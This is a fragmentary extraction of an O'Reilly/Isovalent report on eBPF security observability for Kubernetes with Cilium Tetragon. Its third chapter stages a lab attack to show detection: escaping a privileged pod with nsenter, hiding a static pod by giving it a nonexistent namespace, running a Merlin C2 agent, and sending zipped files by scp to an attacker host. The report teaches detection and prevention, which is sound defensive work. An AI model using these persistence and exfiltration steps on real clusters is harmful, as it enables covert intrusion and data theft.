Isovalent Ebpf Security Observability
Isovalent Ebpf Security Observability
m
pl
im
en
ts
of
Security
Observability
with eBPF
Measuring Cloud Native Security
Through eBPF Observability
REPORT
Security Observability
with eBPF
Measuring Cloud Native Security
Through eBPF Observability
The O’Reilly logo is a registered trademark of O’Reilly Media, Inc. Security Observa‐
bility with eBPF, the cover image, and related trade dress are trademarks of O’Reilly
Media, Inc.
The views expressed in this work are those of the authors and do not represent the
publisher’s views. While the publisher and the authors have used good faith efforts
to ensure that the information and instructions contained in this work are accurate,
the publisher and the authors disclaim all responsibility for errors or omissions,
including without limitation responsibility for damages resulting from the use of
or reliance on this work. Use of the information and instructions contained in this
work is at your own risk. If any code samples or other technology this work contains
or describes is subject to open source licenses or the intellectual property rights of
others, it is your responsibility to ensure that your use thereof complies with such
licenses and/or rights.
This work is part of a collaboration between O’Reilly and Isovalent. See our state‐
ment of editorial independence.
978-1-098-13318-4
[LSI]
Table of Contents
3. Security Observability. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
The Four Golden Signals of Security Observability 23
Process Execution 25
Network Sockets 26
File Access 27
Layer 7 Network Identity 28
Real-World Attack 31
v
4. Security Prevention. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Prevention by Way of Least-Privilege 44
CTFs, Red Teams, Pentesting, Oh My! 55
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
vi | Table of Contents
CHAPTER 1
The Lack of Visibility
1 SLOs are covered in more detail in Site Reliability Engineering by Betsy Beyer et al.
(O’Reilly), which is free to read.
2 Beyer et al., Site Reliability Engineering.
1
• Have any workloads in my environment made a connection to
“known-bad.actorz.com”?
• Show me all local privilege escalation techniques detected in the
last 30 days.
• Have any workloads other than Fluentd used S3 credentials?
3 The wonderful CNCF Technical Security Group has been working on secure defaults
guidelines for CNCF projects.
4 Andrew Martin and Michael Hausenblas, Hacking Kubernetes (O’Reilly).
High-Fidelity Observability
When investigating a threat, the closer to the event the data is, the
higher fidelity the data provides. A compromised pod that escalates
its privileges and laterally moves through the network won’t show
up in our Kubernetes audit logs. If the pods are on the same host,
the lateral movement won’t even show up in our network logs. If our
greatest attack surface is pods, we’ll want our security observability
as close to pods as possible. The “further out” we place our observa‐
bility, the less critical security context we’re afforded. For example,
firewall or network intrusion detection logs from the network gen‐
erally map to the source IP address of the node that the offending
pod resides on due to packet encapsulation that renders the identity
of the source meaningless.
The same lateral movement event can be measured at the virtual
ethernet (veth) interface of the pod or the physical network interface
of the node. Measuring from the network includes the pre-NAT pod
IP address and, with the help of eBPF, we can retrieve Kubernetes
High-Fidelity Observability | 3
labels, namespaces, pod names, etc. We are improving our event
fidelity.
But if we wanted to get even closer to pods, eBPF operates in-kernel
where process requests are captured. We can assert a more meaning‐
ful identity of lateral movement than a network packet at the socket
layer (shown in Figure 1-1), which includes the process that invoked
the connection, any arguments, and the capabilities it’s running
with. Or we can collect process events that never create a packet at
all.
A Kubernetes Attack
Let’s consider a hypothetical attack scenario in Kubernetes. (You
don’t need to understand details of this attack now, but by the end of
this report you’ll understand common attack patterns and how you
can take advantage of simple tools to detect sophisticated attacks.)
Imagine you run a multitenant Kubernetes cluster that hosts both
public-facing and internal applications. One of your tenants runs
an internet-facing application with an insecure version of Apache
What Is eBPF?
eBPF is an emerging technology that enables event-driven custom
code to run natively in an operating system kernel. This has
spawned a new era of network, observability, and security platforms.
eBPF extends kernel functionality without requiring changes to
applications or the kernel to observe and enforce runtime security
policy. eBPF’s origins began with BPF, a kernel technology that was
5 The Log4j vulnerability is due to Log4j parsing logs and attempting to resolve the data
and variables in its input. The JNDI lookup allows variables to be fetched and resolved
over a network, including to arbitrary entities on the internet. More details are in the
CVE.
6 Suspicious domains can include a domain generation algorithm.
What Is eBPF? | 5
originally developed to aid packet filtering such as the inimitable
tcpdump packet-capture utility.
The “enhanced” version of BPF (eBPF) came from an initial patch
set of five thousand lines of code, followed by a group of features
that slowly trickled into the Linux kernel that provided capabilities
for tracing low-level kernel subsystems, drawing inspiration from
the superlative DTrace utility. While eBPF is a Linux (and soon,
Windows) utility, the omnipresent Kubernetes distributed system
has been uniquely positioned to drive the development of eBPF as a
container technology.
eBPF’s unique vantage point in the kernel gives Kubernetes teams
the power of security observability by understanding all process
events, system calls, and networking operations in a Kubernetes
cluster. eBPF’s flexibility also enables runtime security enforcement
for process events, system calls, and networking operations for all
pods, containers, and processes, allowing us to write customizable
logic to instrument the kernel on any kernel event.
We will walk you through in detail what eBPF is, how you can
use eBPF programs, and why they are vital in cloud native security
(Chapter 2). But first we need to understand the basic container
technology concepts.
Kernel Namespaces
A process in Linux is an executable program (such as /bin/grep)
running in-memory by the kernel. A process gets a process ID
or PID (which can be seen when you run ps xao pid,comm), its
own memory address (seen when you run pmap -d $PID), and file
descriptors, used to open, read, and write to files (lsof -p $PID).
Processes run as users with their permissions, either root (UID 0) or
nonroot.
Containers use Linux namespaces to isolate these resources, creat‐
ing the illusion that a container is the only container accessing
resources on a system. Namespaces create an isolated view for vari‐
ous resources:
PID namespace
This namespace masks process IDs so the container only sees
the processes running inside the container and not processes
running in other containers or the Kubernetes node.
Mount namespace
This namespace unpacks the tarball of a container image (called
a base-image) on the node and chroots the directory for the
container.8
Network namespace
This namespace configures network interfaces and routing
tables for containers to send and receive traffic. In Kuber‐
netes, this namespace can be disabled with hostNetwork, which
7 runC is currently the most widely used low-level container runtime. It’s responsible for
“spawning and running containers on Linux according to the OCI specification.”
8 Container runtimes can block the CAP_SYS_CHROOT capability by default, and
pivot_root is used due to security issues with accessible mounts.
Cgroups
Cgroups can limit the node’s CPU and memory resources a con‐
tainer can consume. From a security perspective, this prevents a
“noisy neighbor” or DoS (denial of service) attack where one con‐
tainer consumes all hardware resources on a node. Containers that
exceed CPU will be rate limited by cgroups, whereas exceeding
memory limits will cause an out-of-memory kill (OOM kill) event.
9 Network policy allows you to specify the allowed connections a pod can make. It’s basi‐
cally a firewall for containers. Several CNIs such as Cilium provide custom resource
definitions (CRDs) for network policy to extend functionality to provide a layer 7
firewall, cluster-wide policies, and more.
10 There is an alpha (as of Kubernetes 1.22) project to run Kubernetes Node components
in the user namespace.
Linux Capabilities
In the old world, processes were either run as root (UID 0) or as a
standard user (!=UID 0). This system was binary; either a process
was root and could do (almost) anything or it was a normal user
and was restrained to its own resources. Sometimes unprivileged
processes need privileged capabilities, such as ping sending raw
packets without granting it root permissions. To solve this, the ker‐
nel introduced capabilities, which gives unprivileged processes more
granular security capabilities, such as the capability CAP_NET_RAW to
enable ping to send raw packets.
Capabilities can be implemented on a file or a process. To observe
the capabilities that a running process has, we can inspect the ker‐
nel’s virtual filesystem, /proc:
grep -E 'Cap|Priv' /proc/$(pgrep ping)/status
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
NoNewPrivs: 0
We can then use the capsh binary to decode the values into human
readable capabilities:
capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override...
cap_net_raw...
cap_sys_admin...
11 This is required reading for anyone responsible for securing a cloud native
environment.
Precloud Security
Before cloud native became the dominant production environment,
network monitoring and threat detection tools were based on
auditd, syslog, dead-disk forensics, whatever your network infra‐
structure happened to log, and optionally, copying the full contents
of network packets to disk (known as packet captures).
11
Capturing packets stores every packet in a network to disk and
runs custom pattern matching on each packet to identify an attack.
Most modern application traffic is encrypted, largely thanks to Let’s
Encrypt and service mesh; high-scale environments are now the
norm, so packet captures are too costly and ineffective for cloud
native environments. Another tool used to monitor for security
incidents is disk forensics.
Disk forensics collects a bit-for-bit duplication of a volume or disk
during incident investigation with the goal of useful artifact extrac‐
tion. Forensics artifacts are “the things left behind unintentionally,
unconsciously, often invisibly, that help us get to the bottom of
an incident.”1 While a lot of useful information can reside on-disk,
the artifacts can be fairly random, and you don’t get the luxury of
defining what data you would like to collect. Thus, you’re left with a
literal snapshot of artifacts that exist at the time of capture. Artifacts
in memory are lost altogether unless they’re paged to disk.
Memory forensics started by focusing on a new class of in-memory
attacks; however, most operating systems now deploy kernel address
space layout randomization (KSLR)2 that complicates introspection
of kernel memory and thus gives you only a partial solution.
Contrast this with eBPF, a native kernel technology that allows you
to trace or execute mini programs on virtually any type of kernel
event.3 This enables capturing security observability events with a
native understanding of container attributes like namespaces, capa‐
bilities, and cgroups. Fully customizable programs that run at kernel
events, like a process being created, allow us to have a flexible and
powerful runtime security framework for containers.
1 See the discussion of forensic artifacts by Tetra Defense’s President, Cindy Murphy.
2 Kernel address space layout randomization (KASLR) is a well-known technique to
make exploits harder by placing various objects in the stack at random, rather than
fixed, addresses.
3 As named by Brendan Gregg, an eBPF legend.
This means eBPF allows you to intercept any kernel event, run
customized code on the return value, and react with fully program‐
mable logic. You can think of it as a virtual machine in the kernel
with a generic set of 64-bit registers and eBPF programs that are
attached to kernel code paths.
eBPF Programs
The eBPF verifier and JIT (just-in-time) compiler are components
that ensure that eBPF programs fulfill the following programmabil‐
ity requirements:
Safety from bugs
Before executing the eBPF bytecode (the compiled version of
the eBPF program), the kernel takes and passes it through the
eBPF verifier. The eBPF verifier makes sure that the loaded
program cannot access or expose arbitrary kernel memory to
userspace by rejecting out-of-bound accesses and dangerous
pointer arithmetic. It also ensures that the loaded program will
always terminate to avoid creating an infinite loop in the kernel.
If the verifier fails, the eBPF program will be rejected. This
5 This blog post is a great source to learn and understand the different hook points, data
sources and their advantages.
Starting from the top of the image, you can attach an eBPF program
to userspace applications by hooking on uprobes. This means you
can run an eBPF program for particular functions in your applica‐
tions. This is how you can profile applications using eBPF.
Then, you can attach eBPF programs to arbitrary system calls and
kernel functions, with kprobes. “Kprobes can create instrumentation
events for any kernel function, and it can instrument instructions
within functions. It can do this live, in production environments,
without needing to either reboot the system or run the kernel in
any special mode.”6 Kprobes can include reads and writes to a file,
mounting a sensitive filesystem to a container, changing a kernel
namespace—which can indicate a privilege escalation—loading a
kernel module, creating of a socket, executing a program, and more.
You can also attach to an arbitrary trace point in the Linux kernel.
A trace point is a well-known, defined function name of the Linux
kernel that will stay stable over time. While kernel functions might
change per release, trace points provide a stable API, allowing you
to instrument the entire Linux kernel.
Why eBPF?
eBPF collects and filters security observability data directly in the
kernel, from memory or disk, and exports it to userspace as security
observability events, where the data can be sent to a SIEM for
advanced analysis. Because the kernel is shared across all contain‐
ers,7 these events provide a historical record of the entire environ‐
ment, from containers to the node processes in a Kubernetes cluster
that make up a Kubernetes cluster.
Security observability data includes Kubernetes identity-aware infor‐
mation, such as labels, namespaces, pod names, container images,
and more. eBPF programs can be used to translate and map pro‐
cesses, its system calls, and network functions into a Kubernetes
workload and identity.
eBPF programs are able to both observe Kubernetes workloads and
enforce user-defined security policies. With access to all data that
the kernel is aware of, you can monitor arbitrary kernel events
such as system calls, network sockets, file descriptors, Unix socket
domain connections, etc. Security policies are defined at runtime
that observe and enforce desired behaviors by using a combina‐
tion of kernel events. They can be fine-grained and applied to
specific workloads by using policy selectors. If the appropriate pol‐
icy selectors match, the pod can be terminated or paused for later
investigation.
To benefit from the eBPF-based observability and enforcement, end
users are not expected to write eBPF programs by themselves. There
are already existing projects and vendors creating open source secu‐
rity observability tools that use eBPF programs to provide this
observation and even enforcement, such as Tracee and Falco. We
7 With notable exceptions, such as userspace emulated kernels like gVisor, unikernels,
and other sandboxed environments.
Why eBPF? | 17
will dive deeper into one of them, Cilium Tetragon, and detect a
real-world attack scenario in Chapter 3.
8 The madvise() system call advises the kernel about how to handle paging input/output
in a specific address range. In case of MADV_DONTNEED, the application is finished with
the given range, so the kernel can free resources associated with it. The detailed
description of the Dirty COW Linux privilege escalation vulnerability can be found in
the corresponding CVE.
Network Visibility
Sockets are the operating system representation of communication
between applications on the same node,10 between pods and clus‐
ters, or on the internet. There are many types of sockets in Linux
(IPC, Unix domain, TCP/IP, etc.), but we’re specifically interested in
TCP/IP sockets for security observability.
Sockets provide improved identity over network packets because
socket events are tracked in the operating system kernel and coupled
with process and Kubernetes metadata. This allows you to track
all network behavior and associate that behavior with the specific
workload and service owner. This identity helps remediate, patch, or
lock down a certain pod with network policy if malicious activity is
detected.
eBPF can trace the full lifecycle of a socket and corresponding con‐
nections for every container in your cluster. This includes visibility
for a process listening for a connection, when a socket accepts an
inbound connection from a client, how much data was transferred
in and out of a connection, and when the socket is closed.
9 The pivot_root system call allows you to remount the root filesystem to a nonroot
location, while simultaneously mounting something back on the root. It’s typically used
during a system startup when the system mounts a temporary root filesystem (e.g.,
an initrd), before mounting the real root filesystem, but it can be used for attackers
mounting a sensitive filesystem inside a container.
10 As Michael Kerrisk calls it in The Linux Programming Interface (No Starch Press).
Why eBPF? | 19
Tracking all network connections at the socket layer gives a cluster-
wide view into all network connections in your cluster and includes
the pod and process involved. There are numerous good reasons
to collect network observability data, including to build out a least-
privilege network policy. If you’re planning on using network poli‐
cies, you’ll need network observability to help craft out your policy.
By using network observability, you can also detect several techni‐
ques in the MITRE ATT&CK® framework,11 which is a well-known
knowledge base and model for adversary behavior. For example, you
can identify lateral movement, which is when an attacker “explor[es]
the network to find their target and subsequently gain[s] access to
it. Reaching their objective often involves pivoting through multiple
systems and accounts.”12
Filesystem Visibility
Unauthorized host filesystem access in containers has caused sev‐
eral severe vulnerabilities and privilege escalation techniques. The
official Kubernetes documentation calls this out: “There are many
ways a container with unrestricted access to the host filesystem can
escalate privileges, including reading data from other containers,
and abusing the credentials of system services, such as kubelet.”13
While it’s recommended to use a read-only filesystem for pods,
observability into filesystem mounts inside a container or Kuber‐
netes pods is crucial. We can observe all mount system calls from a
container, which provide visibility for all mounts made in a node.
Observing read and write events to a filesystem or to stdin/stdout/
stderr file descriptors is a powerful method to detect attacker behav‐
ior, including achieving persistence on a compromised system.
Monitoring and enforcing access to sensitive files and credentials
is a good way to get started. For example, by observing write access
to the /root/~.ssh/authorized_keys file, you can identify if an attacker
installs a potential backdoor to maintain a foothold on the system.
Real-World Detection
But how do you translate system calls and socket connections into
detecting a real-world attack? If you run strace on your machine,
you can see that system calls are happening all the time.16 Not
14 An example attack framework can be MITRE. A few steps from the attack are covered
in “Detecting a Container Escape with Cilium and eBPF” by Natalia Reka Ivanko.
15 With some notable exceptions, such as gVisor, which implements a proxy kernel in
userspace or Firecracker, which provides a sandboxed and limited KVM guest per
workload.
16 Strace is a useful diagnostic, instructional, and debugging tool which can help you for
example to observe system calls.
17 There are multiple books and online courses to learn how to define a threat model. An
online course is “Kubernetes Threat Modeling” (O’Reilly).
23
Figure 3-1. eBPF collection points for a process, correlated by the
exec_id value
With the help of the open source eBPF-based tool Cilium Tetra‐
gon, each of the security observability signals can be observed and
exported to user-space as JSON events.
Cilium Tetragon is an open source security observability and run‐
time enforcement tool from the makers of Cilium.3 It captures
different process and network event types through a user-supplied
configuration to enable security observability on arbitrary hook
points in the kernel. These different event types correspond to each
of the golden signals. For example, to detect process execution, Cil‐
ium Tetragon detects when a process starts and stops. To detect net‐
work sockets, it detects whenever a process opens, closes, accepts or
listens in on a network socket. File access is achieved by monitoring
3 Cilium Tetragon is an open source eBPF-based runtime security and visibility tool free
to download. Cilium is an open source software for providing, securing, and observing
network connectivity between container workloads—cloud native, and fueled by the
revolutionary kernel technology eBPF.
Process Execution
This first signal is process execution, which can be observed with
the Cilium Tetragon process_exec and process_exit JSON events.
These events contain the full lifecycle of processes, from fork/exec to
exit,4 including deep metadata such as:
Binary name
Defines the name of an executable file
Binary hash
A more specific form of attribution5 than binary name
Command-line argument
Defines the program runtime behavior
Process ancestry
Helps to identify process execution anomalies (e.g., if a nodejs
app forks a shell, this is suspicious)
Current working directory
Helps to identify hidden malware execution from a temporary
folder, which is a common pattern used in malware
Linux capabilities
Includes effective, permitted, and inheritable,6 which are crucial
for compliance checks and detecting privilege escalation
4 In Linux, fork creates a new child process, which is a replica of its parent. Then the
execve replaces the replica process with another program. Processes terminate by
calling the exit system call after receiving a signal or fatal exception.
5 Attribution refers to using artifacts from an attack to identify an actor or adversary. An
understanding of an adversary through attribution can provide vital defenses against
their known tactics, techniques, and procedures (TTPs).
6 Capability sets define what permissions a capability provides.
Process Execution | 25
Kubernetes metadata
Contains pods, labels, and Kubernetes namespaces, which are
critical to identify service owners, particularly in a multitenant
environment
exec_id
A unique process identifier that correlates all recorded activity
of a process
While the process_exec event shows how and when a process was
started, the process_exit event indicates how and when a process
dies, providing a full lifecycle of all processes. The process_exit
event includes similar metadata than the process_exec event and
shares the same exec_id corresponding to the specific process.
The following snippet highlights some part of a process_exec event
capturing curl against www.google.com from the elasticsearch pod:
"process_exec":{
"process":{
"binary":"/usr/bin/curl",
"arguments":"www.google.com"
"pod":{
"namespace":"tenant-jobs",
"name":"elasticsearch-56f8fc6988-pb8c7",
Network Sockets
The second signal is network sockets, which can be observed with
the Cilium Tetragon process_connect, process_close, and pro
cess_listen JSON events. The process_connect event records
a process network connection to an endpoint, either locally, to
another pod, or to an endpoint on the internet. The process_close
event records a socket closing and includes sent and received byte
statistics for the socket. The process_listen event records a process
listening for connections on a socket. Capturing network sockets
with these events provide:
File Access
The third signal is file access, which can be observed with the Cil‐
ium Tetragon process_kprobe JSON events. By using kprobe hook
points, these events are able to observe arbitrary system calls and
file descriptors in the Linux kernel, giving you the ability to monitor
every file a process opens, reads, writes, and closes throughout its
lifecycle. For example, you can trace Unix domain sockets as files,
which are particularly useful to monitor for an exposed docker
socket, detect filesystem mounts or sensitive file access.
The following snippet highlights the most important parts of a
process_kprobe event, which observes the write system call on
the /etc/passwd file:
"process_kprobe":{
"process":{
"binary":"/usr/bin/vi",
"arguments":"/etc/passwd",
"pod":{
"namespace":"tenant-jobs",
"name":"elasticsearch-56f8fc6988-sh8rm",
Additionally, to the Kubernetes identity and process metadata, the
process_kprobe events contain the arguments of the observed sys‐
tem call. In this case, they are:
path
The observed file’s path
bytes_arg
Content of the observed file encoded in base64
File Access | 27
size_arg
Size of the observed file in bytes
These arguments can be observed in the following snippet under the
function_name field:
"function_name":"write",
"args":[
"file_arg":{
"path":"etc/passwd"
}
"bytes_arg":"ZGFlbW9uOng6MjoyOmRhZW1vbjovc2Jpbjovc2Jpbi",
"size_arg":"627"
]
"process_close":{
"process":{
"exec_id":"bWluaWt1YmU6MzM0OTc2NzgxOTUzNTozODMxNA==",
"binary":"/usr/bin/nc",
"arguments":"raiz3gjkgtfhkkc.not-reverse-shell.com 443"
Real-World Attack
Now that we’ve described the basics of security observability, let’s
observe a real-world attack and detect events with eBPF security
observability along the way. Detecting attacks that you conduct
yourself serves two essential purposes:
9 The different event types that can be detected via Cilium Tetragon can be found on
GitHub.
10 Tactics, techniques, and procedures (TTPs) define the behaviors, methods, and tools
used by threat actors during an attack.
11 Privileged pods have direct access to all of the node’s resources and disables all kernel
sandboxing.
Real-World Attack | 31
host namespaces with the nsenter command, which is shown in
Figure 3-3.
From there, we’ll will write a static pod manifest in the /etc/kuber‐
netes/manifests directory that will cause the kubelet to manage our
pod directly.12 We take advantage of a Kubernetes bug where we
define a Kubernetes namespace that doesn’t exist for our static pod,
which makes the pod invisible to the API server. This makes our
stealthy pod invisible to kubectl and the Kubernetes API server.
Our stealthy static pod runs a Merlin command and control (C2)
agent. “Merlin is a cross-platform, post-exploitation command and
control server and agent written in Go.”13 “A command and control
[C&C] server is a computer controlled by an attacker which is used
to send commands to systems compromised by malware and receive
stolen data from a target network.”14 Our Merlin agent will reach out
to our C2 server infrastructure running at http://main.linux-libs.org.
The attack steps through this point are shown in Figure 3-4:
12 A static pod is locally managed by the kubelet and not the Kubernetes API server.
13 This is from the official Merlin documentation.
14 Trend Micro has an introduction to command and control systems.
Real-World Attack | 33
Second, let’s start minikube and mount the BPF filesystem on the
minikube node:15
minikube start --network-plugin=cni --cni=false --memory=4096 \
--driver=virtualbox --iso-url=https://github.com/kubernetes\
/minikube/releases/download/v1.15.0/minikube-v1.15.0.iso
Now let’s install open source Cilium Tetragon:
helm install -n kube-system cilium-tetragon cilium/tetragon
Wait until the cilium-tetragon pod shows as running:
kubectl get ds -n kube-system cilium-tetragon
NAME READY STATUS RESTARTS AGE
cilium-tetragon-pbs8g 2/2 Running 0 50m
Now let’s observe the four golden signal security observability events
(process_exec, process_exit, process_connect, process_close,
process_listen) by running:
kubectl exec -n kube-system ds/cilium-tetragon -- tail \
-f /var/run/cilium/tetragon.log
Now that we’re capturing security observability events as JSON
files,16 let’s prepare for our attack!
18 The goal of Linux capabilities, in theory, is to eliminate the overly permissive privileges
granted to users and applications by providing a more granular set of permissions.
However, as Michael Kerrisk wrote in 2012, “the powers granted by CAP_SYS_ADMIN
are so numerous and wide-ranging that, armed with that capability, there are several
avenues of attack by which a rogue process could gain all of the other capabilities.”
Real-World Attack | 35
If you look further, you can also inspect the /docker-entrypoint.sh
binary as an entry point from the /usr/bin/containerd-shim parent,
which starts an nginx daemon. The corresponding TCP socket is
represented by a process_listen event, where you can see that /usr/
sbin/nginx listens on port 80:
"process_listen":{
"process":{
"binary":"/usr/sbin/nginx",
"ip":"0.0.0.0",
"port":80,
"protocol":"TCP"
In our kubectl shell, let’s use nsenter to enter the host’s namespace
and run bash as root on the host:
root@minikube:/# nsenter -t 1 -m -u -n -i -p bash
bash-5.0#
Persistence
There are many ways you can achieve persistence.19 In this example,
we’ll use a hidden static Kubernetes pod. When you write a pod spec
in the /etc/kubernetes/manifests directory on a kubeadm bootstrapped
cluster like minikube,20 the kubelet will automatically launch and
locally manage the pod. Normally, a “mirror pod” is created by the
API server, but in this case, we’ll specify a Kubernetes namespace
that doesn’t exist so the “mirror pod” is never created and kubectl
won’t know about it. Because we have unfettered access to node
resources, let’s cd into the /etc/kubernetes/manifests directory and
drop a custom hidden pod spec:
Real-World Attack | 37
cd /etc/kubernetes/manifests
cat << EOF > merlin-agent-silent.yaml
apiVersion: v1
kind: Pod
metadata:
name: merlin-agent
namespace: doesnt-exist
spec:
containers:
- name: merlin-agent
image: merlin-agent-h2:latest
securityContext:
privileged: true
EOF
Now that we’ve written our hidden PodSpec to kubelet’s directory,
we can verify that the pod is invisible to the Kubernetes API server
by running kubectl get pods --all-namespaces; however, it can
be identified by Cilium Tetragon. By monitoring security observa‐
bility events from Cilium Tetragon, you can detect persistence early
in the MITRE framework by detecting the merlin-agent-silent.yaml
file write with /usr/bin/cat in the following process_exec event:
"process_exec":{
"process":{
"cwd":"/etc/kubernetes/manifests/",
"binary":"/usr/bin/cat",
After compromising the cluster and achieving persistence with a
container escape with an invisible container, what can you do next?
There are several post-exploitation techniques: you can gain further
access to the target’s internal networks, gather credentials, create
a C2 infrastructure, or exfiltrate data from the environment. In
this report, we’ll create a command and control infrastructure and
perform data exfiltration on the environment by locating sensitive
PDF files and sending them over via an SSH tunnel with the C2
agent. The detailed attack steps are shown in Figure 3-3 and will be
covered in the next section.
C2 agent
As a post-exploitation step, we created a C2 agent for persistence
with a custom docker image that establishes a persistent connection
with the C2 server. In Figure 3-5, we cover each step of the post-
exploitation behavior in the attack.
21 Having the credentials in the arguments is beneficial for detecting the attack, but if
you’re concerned about leaking secrets in process arguments, these can be removed via
Cilium Tetragon configuration in the future.
Real-World Attack | 39
In this case, the agent is using HTTP2 to communicate with the
server with the exchanged SecurePSK!23@456 key. We can use the
exec_id to correlate all events from the process, including the corre‐
sponding TCP socket in a process_connect event. By inspecting the
destination IP address 34.116.205.187 and port 443, we’ve located
the C2 server:
"process_connect":{
"process":{
"exec_id":"bWluaWt1YmU6MjA4MjU3MzM4MjgwMToyNTc0NA==",
"cwd":"/opt/merlin-agent/",
"binary":"/tmp/go-build3518135900/b001/exe/main",
"destination_ip":"34.116.205.187",
"destination_port":443,
"protocol":"TCP"
Using the same exec_id, we can identify all the activity of the
agent, including the agent reaching out regularly to the server and
executing any commands supplied from the attacker. This is repre‐
sented by two events: a process_connect and the corresponding
process_close:
"process_close":{
"process":{
"exec_id":"bWluaWt1YmU6MjA4MjU3MzM4MjgwMToyNTc0NA==",
"cwd":"/opt/merlin-agent/",
"binary":"/tmp/go-build3518135900/b001/exe/main",
"arguments":"-v -url https://main.linux-libs.org:443
-proto h2 -psk SecurePSK!23@456”,
"destination_ip":"34.116.205.187",
"destination_port":443,
"stats":{
"bytes_sent":"4364",
"bytes_received":"8874",
Exfiltrating data
Following the MITRE ATT&CK framework, we’ve detected events
covering initial access, execution, persistence, privilege escalation,
defense evasion, and command and control. Now we can focus
on post-exploitation techniques such as harvesting credentials or
stealing sensitive data from other potential victims.
From the main C2 server, you can gather sensitive files by using
the find or the locate commands, then compress them with 7zip,22
While in the second process_exec event, you can see the 7zip child
process:
"process_exec":{
"process":{
"binary":"/usr/bin/7z",
"arguments":"-c \"7z a s3nsitiv3.7z
../ops_bank_accounts/\"",
By looking for the same exec_id, you can identify the two cor‐
responding process_exit events (1, 2), which show that both
the /bin/sh and the 7zip processes are terminated, thus the com‐
pression has finished.
The final step is to upload the s3nsitiv3.7z to the server. You
can use scp to copy the file over an SSH tunnel or alternatively,
there is a built-in upload command in Merlin.23 By choosing the
first option, we transferred the file via scp -i /root/.ssh/id_rsa
s3nsitiv3.7z attacker@34.116.205.187:~. The file transfer is
presented by three process_exec events. The first event in the chain
represents the SSH tunnel that was opened by the /usr/bin/ssh
binary:
"process_exec":{
"process":{
"binary":"/usr/bin/ssh",
"arguments":"-i /root/.ssh/id_rsa -l
attacker@34.116.205.187 \"scp -t ~\"",
The second event, its child process, shows the /bin/sh execution,
while the last event in the chain represents the actual scp command:
23 Merlin is a post-exploit command and control (C2) tool, also known as a Remote
Access Tool (RAT), that communicates using the HTTP/1.1, HTTP/2, and HTTP/3
protocols.
Real-World Attack | 41
"process_exec":{
"process":{
"cwd":"/opt/merlin-agent/",
"binary":"/bin/sh",
"arguments":"-c \"scp -i ~/.ssh/id_rsa s3nsitiv3.7z
attacker@34.116.205.187:~\"",
"process_exec":{
"process":{
"binary":"/usr/bin/scp",
"arguments":"-i /root/.ssh/id_rsa s3nsitiv3.7z
attacker@34.116.205.187:~",
1 The setuid system call sets the effective user ID of a process. The effective user ID is
used by the operating system to determine privileges for an action.
43
Security observability can also highlight misconfigurations or overly
permissive privileges in your workloads. This gives security the data
it needs to objectively measure their security state, in real time
and historically. Security could adopt a lot from SRE: observability,
blameless post-mortems, error budgets, security testing, security
level objectives, and more. It’s all rooted by collecting and measuring
our observability data.
2 In a 2016 blog post, Jessie Frazelle describes how to create your own custom seccomp
profile by capturing all the system calls your workload requires, and describes how the
default Docker seccomp profile was created based on such an allowlist policy.
3 Misconfiguration accounted for 59% of detected security incidents related to Kuber‐
netes according to Red Hat’s State of Kubernetes Security Report.
4 Red team is a term that describes various penetration testing, including authorized
attacks on infrastructure and code, with the intent of improving the security of an
environment by highlighting weak points in their defenses.
5 This assumes you trust your build and supply chain security. The state-of-the-art
defense for supply chain security in cloud native is Sigstore, which has automated
digitally signing and checking components of your build process. According to AWS
CloudFormation, “Drift detection enables you to detect whether a stack’s actual config‐
uration differs, or has drifted, from its expected configuration.”
Tracing Policy
Whether you’re building out an allowlist or a denylist, you can
use Cilium Tetragon to get an enforcement framework called trac‐
ing policy. Tracing policy is a user-configurable Kubernetes custom
6 Our GitHub repo contains all the events and prevention policies discussed in this book.
7 Gitops refers to the patterns in cloud native environments where changes to infrastruc‐
ture are made to a version control system, and CI/CD pipelines test and apply changes
automatically. In short, operations teams adopt development team patterns.
8 Seccomp acts on user-configurable profiles, which are configuration files that specify
the system calls and arguments a container is allowed or disallowed to invoke.
9 Pod readiness gates are part of the pod lifecycle events and indicate that a pod is healthy
and ready to receive traffic.
10 Additional prevention mechanisms such as the kernel’s cgroup freezer mechanism are
supported, which stops a container but leaves its state (stack, file descriptors, etc.) in
place for forensic extraction.
Stage 1: Exploitation
The first stage of the attack we carried out in Chapter 3 takes advan‐
tage of an overly permissive pod configuration to exploit the system
with a hidden command and control (C2) pod. We launched a privi‐
leged pod that grants,11 among other things, the CAP_SYS_ADMIN
Linux capability. This configuration can facilitate a direct access to
host resources from a pod, often giving a pod the same permissions
as root on the node:
kind: Pod
…
name: merlin-agent
namespace: doesnt-exist
hostNetwork: true
…
securityContext:
privileged: true
11 A privileged container is able to access and manipulate any devices on a host, thanks to
being granted the CAP_SYS_ADMIN capability.
12 Admission controllers are an essential security tool to build out a security policy for
Kubernetes objects.
13 In the video “The Hitchhiker’s Guide to Container Security”, we use OPA to block
dangerous pod configurations.
14 Here is an example prevention policy for privileged pods.
17 Ian Coldwater and Brad Geesaman discuss several attack vectors on Kubernetes clus‐
ters in this recording. It is required viewing for defenders.
18 Layer 7 network policy examples can be found on the Cilium site.
19 These include hostPID, hostIPC, hostNetwork, hostPorts, and allowedHostPaths.
The Kubernetes documentation explicitly calls out that host resources are a known
source of privilege escalation and should be avoided.
21 The Cilium CNI provides network observability via Hubble which can also be used to
create observability-driven policy.
Data-Driven Security
Now that we’ve locked down our environment to prevent this attack,
we recommend that you continue to make continuous observations
and improvements to your security posture with security observa‐
bility. Preventing an attack starts with detecting it, and ensuring
you have a high fidelity of security observability to detect malicious
behavior also ensures you have the inputs for making ongoing
improvements to your prevention policy.
This data-driven workflow to create and continuously improve your
security is the most crucial part of observability-driven policy.
We hope you’ve enjoyed this short journey into the world of security
observability and eBPF. It is the technology we’ve always wanted
when in the trenches of threat detection and security engineering
due to the fully customizable, in-kernel detection and prevention
capabilities. It’s an incredibly exciting time for eBPF as it’s gone from
an emerging Linux kernel technology to the one of the hottest new
tools in distributed computing and infrastructure technology.
As more companies are shifting to containers and cloud native
infrastructure, securing Kubernetes environments has never been
more critical. Security observability in cloud native environments is
the only data you need to create a least-privilege configuration for
your workloads, rapidly threat hunt across your entire environment,
or detect a breach or compromise.
